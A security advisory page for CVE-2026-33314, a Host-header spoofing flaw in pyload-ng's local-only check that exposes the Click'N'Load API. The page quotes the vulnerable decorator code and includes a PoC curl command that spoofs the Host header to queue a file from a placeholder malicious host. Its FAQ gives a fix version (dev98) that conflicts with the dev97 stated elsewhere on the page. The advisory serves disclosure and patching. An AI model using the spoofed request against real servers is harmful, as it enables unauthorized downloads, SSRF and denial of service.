CVE-2026-33314: pyload-ng: Improper Authentication and Origin Validation Error

Published Mar 19, 2026
·
Updated

Summary

A Host Header Spoofing vulnerability in the @localcheck decorator allows unauthenticated external attackers to bypass local-only restrictions. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS).

Details

The pyload WebUI provides an API for the Click'N'Load plugin, which is intended to be accessed only from the local machine (e.g., via a browser extension sending requests to localhost:9666). To enforce this, the pyload application uses a @localcheck decorator on the relevant routes in src/pyload/webui/app/blueprints/cnlblueprint.py.

However, the @localcheck implementation relies on the user-controlled HTTPHOST (derived from the HTTP Host header) to verify the origin:

python src/pyload/webui/app/blueprints/cnlblueprint.py def localcheck(func): @wraps(func) def wrapper(args, kwargs): remoteaddr = flask.request.environ.get("REMOTEADDR", "0") httphost = flask.request.environ.get("HTTPHOST", "0")

if remoteaddr in ("127.0.0.1", "::ffff:127.0.0.1", "::1", "localhost") or httphost in ( "127.0.0.1:9666", "[::1]:9666", ): return func(args, kwargs) else: return "Forbidden", 403 return wrapper

Because httphost is read directly from the Host header of the HTTP request, an external attacker can easily spoof this header (e.g., Host: 127.0.0.1:9666). When this spoofed header is present, the condition httphost in ("127.0.0.1:9666", ...) evaluates to True, completely bypassing the IP address check (remoteaddr) and granting access to the protected functions.

The affected routes are:

- /flash/ and /flash/<id> - /flash/add - /flash/addcrypted - /flash/addcrypted2 - /flashgot and /flashgotpyload - /flash/checkSupportForUrl

PoC

1. Ensure the PyLoad instance is running and accessible externally. 2. Ensure the ClickNLoad plugin is enabled in the PyLoad settings (it evaluates to disabled by default). 3. Send a POST request to one of the protected endpoints, such as /flash/add, and spoof the Host header to 127.0.0.1:9666.

Example curl command:

bash curl -i -X POST "http://<pyload-external-ip>:<port>/flash/add" \ -H "Host: 127.0.0.1:9666" \ -d "urls=http://malicious.com/payload.bin" \ -d "package=MaliciousPackage"

4. Notice that you receive a success\r\n response instead of a 403 Forbidden. The package and URL will be successfully added to the PyLoad queue.

Impact

This vulnerability allows unauthenticated attackers to interact with the Click'N'Load API. Attackers can arbitrarily add URLs to the download queue, which forces the PyLoad server to make outbound requests to attacker-controlled or internal URLs (SSRF). Attackers can also exhaust the server's storage or bandwidth by queueing massive files (DoS).

Other sources

pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, a Host Header Spoofing vulnerability in the @localcheck decorator allows unauthenticated external attackers to bypass local-only restrictions. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS). This issue has been patched in version 0.5.0b3.dev97.

— MITRE

Affected Software

2 affected componentsFixes available
pip/pyload-ng<=0.5.0b3.dev96
0.5.0b3.dev97
Pyload-ng Project Pyload-ng Python<0.5.0b3.dev97

Event History

Mar 19, 2026
Advisory Published
via GitHub·05:55 PM
Data Sourced
via GitHub·05:55 PM
DescriptionSeverityWeaknessAffected Software
Mar 24, 2026
CVE Published
via MITRE·06:52 PM
Data Sourced
via MITRE·06:52 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·08:16 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2026-33314?

CVE-2026-33314 is a critical vulnerability that allows unauthenticated attackers to bypass local-only restrictions.

2

How do I fix CVE-2026-33314?

To fix CVE-2026-33314, update to pyload-ng version 0.5.0b3.dev98 or later.

3

What kind of attacks can be executed through CVE-2026-33314?

CVE-2026-33314 enables attackers to access the Click'N'Load API, potentially allowing them to queue arbitrary downloads.

4

What systems are affected by CVE-2026-33314?

CVE-2026-33314 affects pyload-ng versions up to and including 0.5.0b3.dev96.

5

Is authentication required for exploiting CVE-2026-33314?

No, CVE-2026-33314 can be exploited by unauthenticated external attackers.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203